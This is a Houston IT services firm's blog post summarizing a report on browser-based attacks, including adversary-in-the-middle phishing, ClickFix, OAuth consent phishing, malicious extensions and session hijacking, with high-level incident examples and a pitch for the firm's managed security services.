Cybersecurity Houston Alert: Browser-Based Attacks Are the Biggest Threat Your Business Isn't Watching For

For years, cybersecurity focused on protecting the endpoint - the laptop, the desktop, the server. But the report makes a convincing case that the center of gravity has shifted. Modern breaches start in the browser and, frequently, never leave it. Attackers take over accounts, hijack access to cloud apps, and extract data - all through the browser window.

The attack economics tell the story clearly. A Chrome remote code execution exploit costs around $250,000. An identity provider admin account from a criminal broker runs about $3,000. A phishing kit rental for a year costs $1,000. And a bulk list of stolen credentials? $15. The barrier to entry for browser-based attacks is almost nonexistent compared to traditional exploits.

Attackers are also getting smarter about delivery. They're distributing malicious links through LinkedIn DMs, Google Search ads, and social media - channels that have almost no content screening and are invisible to most security tools. When they do use email, they abuse legitimate services to send from trusted domains, bypassing email security entirely.

The legitimate services being abused reads like a who's who of business tools: Microsoft Dynamics, SharePoint, Adobe, Google Firebase, Google Sites, Jotform, Cloudflare, Atlassian, and more. According to the report, 95% of in-browser attacks detected used some form of bot protection service to evade scanning tools. The attackers are using security tools against other security tools.

For Houston businesses running Microsoft 365 and cloud-based applications, this shift demands a rethink. It's not enough to protect the device. You need to protect what's happening inside the browser session.

Adversary-in-the-Middle, or AitM, is a reverse-proxy phishing technique where the attacker relays traffic between a fake site and the real site in real time. As the victim enters credentials, passes MFA checks, and receives a session token from the application, the attacker intercepts everything. The victim is then redirected to the real site, reducing suspicion.

This is not theoretical. AitM is now the standard phishing method in use today. The report identifies Tycoon 2FA as the dominant phishing kit, responsible for 59% of detections, followed by Sneaky2FA, FlowerStorm, Evilginx, NakedPages, and Gabagool. These kits are available for rent on criminal marketplaces and are constantly adding new features - better site impersonation, new detection evasion, and improved social engineering.

The primary targets are enterprise cloud and identity provider accounts - Google Workspace, Microsoft Entra, and Okta. Once an attacker captures a session for an identity provider, they can hijack single sign-on to pivot into downstream SaaS applications, dramatically increasing the blast radius of a single compromise.

The Scattered Lapsus$ Hunters collective (a merger of Scattered Spider, Lapsus$, and ShinyHunters) is running a campaign that has targeted over 100 companies using a human-operated AitM kit. The attacker calls the victim impersonating IT, directs them to a branded phishing page, captures their session in real time, and then guides them through setting up a passkey - which the attacker also intercepts for persistent access. Victims include Betterment, Crunchbase, SoundCloud, and Match Group.

The critical takeaway for Houston businesses: MFA alone does not stop AitM attacks. If your phishing defense relies on email filters and MFA, you have a gap that attackers are actively exploiting.

ClickFix attacks trick users into performing malicious actions under the guise of "fixing" a problem or "verifying they're human." The most common version mimics the bot protection challenges everyone encounters on the web. The user copies malicious code to their clipboard and is guided to paste and execute it on their machine - installing remote access tools and infostealer malware.

ClickFix was the most common initial access vector reported by Microsoft in 2025, accounting for 47% of attacks. CrowdStrike reported that fake CAPTCHA lures were the most common malware download they identified, increasing 563%. Four out of five ClickFix payloads intercepted by Push were accessed through search engines as the result of malvertising or infected webpages - not email.

What makes ClickFix effective is that it's both fileless and user-executed. Because the user initiates the action rather than a program, EDR tools are less likely to flag it. Combined with polished lures that include video instructions and countdown timers, the social engineering is extremely convincing.

ConsentFix: A Fully Browser-Native Variant

Push Security researchers discovered a new variant called ConsentFix in late 2025. This attack merges ClickFix-style social engineering with a fully browser-based attack path. The victim copies sensitive OAuth key material from a legitimate Microsoft webpage into a phishing site, unknowingly giving the attacker control of their account through Azure CLI. No endpoint malware involved at all.

This campaign was traced back to Russian state-affiliated APT29. The phishing pages were injected into numerous compromised websites and fingerprinted visitors' IP addresses and browsers - only triggering once per visitor and only when specific conditions were met. It ran undetected for months.

For businesses in Katy, Sugar Land, and the greater Houston area, the lesson is clear: your employees don't need to click a suspicious email link to get compromised. A Google search, an infected website, or a LinkedIn message can do the job.

OAuth attacks are growing fast, and they sidestep the traditional login process entirely. The attacker creates a malicious application - or sets up a fake instance of an existing legitimate app - and tricks the victim into authorizing it. Two primary techniques are in play: consent phishing (authorizing a third-party app via an OAuth consent grant) and device code phishing (authorizing an app via a device code flow).

The dangerous part: the victim never enters a password and never passes an MFA check. They click a button or enter a code on a legitimate webpage. That's it. Normal login protections, including phishing-resistant authentication like passkeys, are completely circumvented.

The Scattered Lapsus$ Hunters collective demonstrated the scale of this technique with a massive campaign against Salesforce customers in 2025. They registered a malicious "DataLoader" app (mimicking a legitimate Salesforce tool) configured to request broad OAuth scopes - full API access and the ability to generate refresh tokens without re-authentication. The attacker called victims impersonating IT and walked them through authorizing the app. The result: over 1,000 organizations claimed compromised and 1.5 billion records stolen.

Users aren't trained to recognize OAuth authorization as a threat. It doesn't feel risky the way entering a password does. You're just clicking a button on a real Microsoft or Salesforce page. This is a serious awareness gap that law firms, CPA practices, and other professional services firms across Houston need to address.

Malicious browser extensions are becoming one of the most scalable attack vectors available. The typical pattern: an attacker acquires a legitimate, popular extension - either by phishing the developer, purchasing it outright, or building their own - and then pushes a malicious update. Every browser with that extension installed is infected on the next auto-update.

The Cyberhaven extension compromise in December 2024 is a textbook example. Attackers phished a developer into authorizing a malicious OAuth app, gained permissions to manage Chrome Web Store extensions, and uploaded a compromised version. Every time a browser with the infected extension launched, it fetched a configuration from a remote server. Different browsers received different payloads - some harvested Facebook Ads tokens, others targeted OpenAI session tokens. By dynamically loading configurations, the actual malicious behavior couldn't be identified through static code analysis alone.

A more recent campaign called "GhostPoster" involved 34 extensions with 890,000 installs. The malicious code waited 48 hours between check-ins and only loaded its payload 10% of the time - making detection through behavioral analysis extremely difficult.

Permissions alone aren't a reliable indicator of risk. Almost every extension has permissions that could be exploited. And malicious extensions regularly achieve "Featured" or "Verified" status in browser extension stores by using dynamically compiled, stealthily smuggled code that passes security reviews.

For construction companies, manufacturers, and other Houston businesses where employees install browser extensions for productivity, this is a real and growing risk vector that needs managed IT oversight.

Password-based attacks are arguably worse than ever. There are now billions of stolen credentials available online, fed by a constant stream of infostealer infections and data breaches. Attackers download credential databases and spray them across business applications. When they find a match with no MFA, they're in.

The numbers from Push Security's data on the last million logins they observed are striking:

• 1 in 4 were password logins, not SSO
• 2 in 5 were not protected by MFA
• 1 in 5 used a weak, breached, or reused password

The assumption that "our users log in via SSO and MFA protects everything" doesn't hold up in practice. Many SaaS apps charge extra for SAML SSO or don't offer it at all. Even when SSO is available, shadow IT adoption means apps get used before IT configures them. And here's the kicker: most apps support simultaneous login methods by default and don't let you disable alternatives. This creates what Push calls "ghost logins" - backup authentication paths outside your SSO that don't show up in your identity provider logs.

The Snowflake breach of 2024 is the poster child. ShinyHunters breached more than 165 organizations by logging into their Snowflake tenants with stolen credentials. 80% of the compromised accounts had been exposed in prior breaches, with some credentials dating back to 2020. Over 1 billion records were stolen from just 9 publicly named victims.

For every wealth management firm, engineering company, and oil and gas operator in the Houston metro area: if you can't see every login method for every app your team uses, you have ghost logins. And attackers know how to find them.

Session hijacking attacks take an already-approved session token from a victim's device or browser and replay it in the attacker's browser. This bypasses the authentication process entirely - including phishing-resistant controls like passkeys. The attacker doesn't need to log in at all. They just import a valid session cookie and they're inside the account.

The primary source of stolen session tokens is infostealer malware, often delivered via ClickFix. Malicious browser extensions can also extract session tokens from visited webpages. Once stolen, these tokens are sold or used directly by the attacker.

The 2023 Okta incident illustrates the cascade effect. An Okta support engineer's personal device was infected with infostealer malware. The attacker accessed corporate credentials that had been synced to the employee's personal Google account, then used those to access Okta's customer support portal. From there, they downloaded files containing session tokens for customer tenants. 134 customers were impacted. BeyondTrust, 1Password, and Cloudflare all reported further attacker activity - with Cloudflare confirming the attacker accessed their internal Atlassian server, Confluence wiki, Jira database, and source code.

The root cause: an employee had signed into their personal Google profile on their corporate laptop. Corporate credentials synced to the personal account, and when the personal device was compromised, those credentials went with it. This is a reminder that browser profile syncing between personal and work accounts is a real security risk that most organizations don't track.

The reason these attacks work so well is that they find gaps in every layer of the traditional security stack. The report maps it out by control type:

• Email security: Bypassed by delivering links through LinkedIn DMs, Google Search ads, and social media. When email is used, attackers send from trusted domains through legitimate services. They also avoid known-bad domains through constant rotation.
• Secure web gateways: Bypassed through HTML smuggling, client-side reassembly of encoded pages, and rapid domain rotation that outpaces blocklists.
• Remote browser isolation: Designed to protect against exploits targeting the browser software itself - not attacks happening inside the browser session like account takeover.
• File sandboxes: Bypassed through HTML smuggling and fileless delivery methods like ClickFix.
• Endpoint security: Most browser-based attacks never touch the endpoint. When they do, methods like ClickFix enable stealthy execution that's harder for EDR to flag.
• Identity and authentication: 2 in 5 logins lack MFA. Ghost logins circumvent SSO. Downgrade attacks can get around phishing-resistant authentication. Many attacks are post-authentication, succeeding regardless of how strong the login process is.
• Cloud security: In-app exploitation blends in with normal user activity. Cloud logging is inconsistent across apps, creating visibility gaps.

None of these controls are bad. They were built for a different threat model. The point is that browser-based attacks have exposed a gap between what these tools were designed to do and what attackers are actually doing today. For businesses in Cypress, The Woodlands, and across the Houston metro area, this means evaluating your security stack with browser-based threats in mind.

The threats outlined in this report aren't limited to enterprises with dedicated security teams. Small and mid-sized businesses in Houston are targeted by the same attack techniques - often more aggressively because attackers know defenses are thinner. CinchOps helps businesses with 10-200 employees close these gaps with managed cybersecurity and IT support designed for the browser-first threat environment.

• Phishing-resistant authentication deployment: CinchOps helps businesses move beyond basic MFA to phishing-resistant methods where supported, while implementing layered controls for applications that don't yet support them.
• SSO and ghost login auditing: We identify shadow IT and ghost logins across your SaaS environment - finding the backup authentication paths that attackers exploit but that don't appear in your identity provider logs.
• Browser extension management: CinchOps establishes policies and monitoring for browser extensions, blocking known-malicious extensions and flagging risky permissions before they become a problem.
• Credential monitoring and breach exposure checks: We proactively check employee credentials against known breach databases and dark web feeds, flagging compromised and reused passwords before attackers use them.
• Security awareness training for modern threats: Traditional phishing training doesn't cover OAuth consent attacks, ClickFix fake CAPTCHAs, or browser extension compromises. CinchOps delivers training that addresses the threats your team actually faces today.
• Cloud application security posture management: We audit and harden your Microsoft 365, Google Workspace, and SaaS configurations to limit OAuth app permissions, enforce conditional access policies, and reduce the blast radius of any account compromise.
• Incident detection and response: CinchOps monitors for signs of browser-based compromise, including unusual session activity, unauthorized OAuth grants, and credential abuse across your cloud environment.

Browser-based attacks are the primary threat vector for 2026. With CinchOps as your managed IT services provider in Houston and Katy, you don't need an in-house security team to defend against them. You need a partner who understands how these attacks work and has the tools and processes to stop them.